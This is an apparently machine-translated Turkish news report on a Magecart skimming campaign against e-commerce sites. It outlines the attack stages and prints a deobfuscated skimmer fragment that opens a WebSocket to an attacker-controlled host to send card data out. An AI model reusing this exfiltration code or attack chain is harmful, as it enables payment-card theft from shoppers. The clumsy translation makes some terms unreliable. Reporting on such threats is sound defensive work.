Hassas ödeme bilgilerini toplamak için yoğun bir şekilde gizlenmiş JavaScript kodu kullanan e-ticaret platformlarını hedefleyen sofistike bir Magecart saldırısı kampanyası keşfedildi.
Magecart sıyırma saldırılarının bu son varyantı, ödeme işlemi sırasında kredi kartı ayrıntılarını sorunsuz bir şekilde yakalarken, kaçınma tespiti için gelişmiş teknikler sergiliyor.
Geri ihlal edilmiş e-ticaret sitelerine enjekte edilen kötü amaçlı kod, arka planda sessizce çalışır ve şüphesiz müşteriler ve saldırganların komut ve kontrol sunucuları arasında görünmez bir köprü oluşturur.
.png
)
Saldırı, web sitesinin arka uç sistemlerine yetkisiz erişimle başlayan çok aşamalı bir saldırı düzenini takip ediyor.
.webp)
Saldırı Adımları (Kaynak – Yareks)
Bulgulara göre, saldırganlar başlangıçta yönetici kimlik bilgilerini tehlikeye atıyor, genellikle mağdurların sistemlerine yerleştirilen Infostealer kötü amaçlı yazılımlar aracılığıyla çalınan bilgileri kullanarak.
Bu kimlik bilgileri, saldırganlara saldırı sıralarını başlatmak için gereken ayrıcalıklı erişimi sağlar, bu da standart güvenlik önlemlerini atlamalarına ve hedef altyapı içinde bir dayanak oluşturmalarına olanak tanır.
.webp)
Yarix araştırmacıları, uzlaşmış e-ticaret platformlarının adli bir araştırması sırasında bu özel magecart suşunu belirlediler.
Analizleri, saldırganların idari erişim elde ettikten sonra, kalıcı erişimi sürdürmek için özelleştirilmiş bir PHP web kabuğu yüklediklerini ve ilk ihlal keşfedilse bile sunucu üzerinde sürekli kontrol sağladığını ortaya koydu.
Web kabuğu, açık kaynaklı Pas Fork v. 1.4 aracına yapısal benzerlikler taşıyor, ancak bu saldırı kampanyasına özgü özel değişiklikler içeriyor.
Bu saldırıların etkisi finansal kayıpların ötesine uzanarak etkilenen tüccarlar için önemli itibar hasarı yaratır ve tüketici güvenini aşındırır.
Çalınan veriler tipik olarak tam kart detayları (sayı, son kullanma tarihi, CVV), kişisel bilgiler (isim, adres, e -posta) ve genellikle gönderim detaylarını içerir – esasen saldırganlara hileli işlemler yapmak veya kimlik hırsızlığı yapmak için gereken her şeyi sağlar.
.webp)
Saldırı ilerlemesi dört farklı aşamayı takip eder: çalınan kimlik bilgileri kullanılarak ilk arka uç erişimi, kalıcı kontrol için web kabuğu kurulumu, gizli kod enjeksiyonu yoluyla veritabanı zehirlenmesi ve son olarak, müşteri ödeme bilgilerinin yakalandığı ve açıklandığı kredi kartı hırsızlığı aşaması.
Bu metodik yaklaşım, bu tehdit aktörleri tarafından kullanılan sofistike taktikleri göstermektedir.
JavaScript Gizat ve Veri Sınırlama Teknikleri
Kötü niyetli JavaScript, tespitten kaçınmak için sofistike şaşkınlık teknikleri kullanır. Orijinal kod, onaltılık değerlerin, değişken atamaların ve işlev çağrılarının girinti olmadan okunamayan bir karmakarısı olarak görünür.
“Bukalemun” adlı temel bir işlev, yürütme sırasında kendini dinamik olarak yeniden tanımlayan ve analizi daha da karmaşıklaştırmak için derhal çağrılan işlev ifadeleri (IIPE) ile birlikte çalışarak dinamik olarak yeniden tanımlayan gizleme stratejisinin temel taşı olarak hizmet eder.
createWebSocket=(randomString=genRandomString())=>{
if(Mp2mK1sl_Socket!==![] || localStorage['getItem']
('XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf')===null)
return![];
Mp2mK1sl_Socket=new WebSocket('wss://'+JSON['parse'](localStorage['getItem']
('XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf'))['map']
(function(_Oxe38f46) {
return String['fromCharCode'](_Oxe38f46);
})['join']('')+'?token='+randomString)
}Veri eksfiltrasyon mekanizması, başarılı hırsızlık sağlamak için iki farklı kanal kullanır.
Birincil yöntem, saldırgan kontrollü sunucularla gerçek zamanlı iletişim için WebSockets’i kullanırken, ikincil bir teknik, kodlanmış kredi kartı verileri içeren görünmez istekler oluşturmak için görüntü nesnesini kullanır.
Bu yenilikçi çift kanallı yaklaşım, ağ izleme sistemleri bir eksfiltrasyon yöntemini algılayabilse ve engelleyebilse bile saldırganların veri çıkarma şansını arttırır.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy